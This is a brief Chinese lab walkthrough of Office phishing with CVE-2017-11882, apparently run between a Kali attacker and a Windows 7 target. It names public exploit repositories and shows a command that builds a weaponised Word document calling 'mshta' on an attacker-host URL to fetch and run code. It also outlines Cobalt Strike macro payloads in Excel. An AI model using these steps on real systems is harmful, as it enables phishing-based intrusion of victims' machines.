office简单钓鱼与cve2017-11882
cve2017-11882
靶机 windows07
攻击机 kali
1)先下载msf payload与py生成的word
msf payload
https://github.com/0x09AL/CVE-2017-11882-metasploit
路径
cve_2017_11882.rb
放在usr/share/metasploit-framework/modules/exploits/windows/smb
cve-2017-11882.rtf
放在usr/share/metasploit-framework/data/exploits/
指令
mv cve-2017-11882.rtf /usr/share/metasploit-framework/data/exploits/
word py
https://github.com/Ridter/CVE-2017-11882/
生成word
python Command109b_CVE-2017-11882.py -c "mshta http://192.168.5.102:8080/test" -o test.doc
2)配置msf
进入msf
依次
3)
将生成的t.doc放入win7,然后执行
这里我无法进入meterpreter,可直接退出,然后session查看
利用cs生成office宏
复制cs代码,然后保存为启用宏的excel
打开,会有禁用宏,然后启用。cs上线
利用宏的方式必须启用。